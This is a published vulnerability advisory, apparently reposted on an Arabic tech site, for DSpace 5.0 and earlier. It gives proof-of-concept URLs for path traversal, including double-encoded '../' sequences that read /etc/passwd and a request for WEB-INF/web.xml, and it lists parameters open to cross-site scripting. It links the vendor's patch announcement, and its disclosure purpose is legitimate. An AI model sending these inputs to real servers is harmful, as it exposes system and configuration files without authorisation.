fbpx

 

Dspace Multiple Vulnerabilities

DSpace 5.x suffers from several vulnerabilities, including XSS, Path Traversal 

Exploit Title: Dspace Multiple Vulnerabilities 

Date: 3/2/2015
Exploit Author: Khalil Shreateh
Software Link: http://demo.dspace.org/
Version: DSpace <= 5.0
Tested on: Windows 7
 
Quote: 
"DSpace open source software is a turnkey repository application used by more than 1000+ organizations and institutions worldwide to provide durable access to digital resources."
 
Vulnerabilities 

XMLUI (Cocoon/XSLT) - The XML / XSLT / Cocoon user interface

This version suffers from Path Traversal vulnerability, to exploit this vulnerability i used double encoding for the dot (.) 

so the ../  wil be %252e%252e/  

POC : 

http://TARGET/static/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

JSPUI (JSP) - traditional JSP-based interface 

A. Path Traversal Vulnerability

The first vulnerability in this version allows to read files on server .

POC : 
http://TARGET/handle/10673/1/WEB-INF/web.xml

B. Cross Site Scripting (XSS) Vulnerability

The second vulnerability in this version allows to execute arbitrary commands and display arbitrary content in a victim user's browser

The vulnerability exists in several varialbes

- filtertype

- filter_type_1

- filtername

- filter_field_1

All the above varialbes are not sanitized correctly . 

 

PATCH : 

Dspace team annoucement article : 
http://dspace.2283337.n4.nabble.com/DSPACE-SECURITY-ADVISORY-New-DSpace-5-1-4-3-and-3-4-releases-resolve-security-issues-in-XMLUI-and-JSI-td4676801.html

 

للدعم شارك مع اصدقائك

الأكثر قراءة

أحدث المقالات

حماية خصوصية فيسبوك أبل انستجرام جوجل يوتيوب تيكتوك تويتر ذكاء اصطناعي تعليم ميكروسوفت برامج سوشيال ميديا اندرويد لينكدان التزييف العميق العاب ميتا تسويق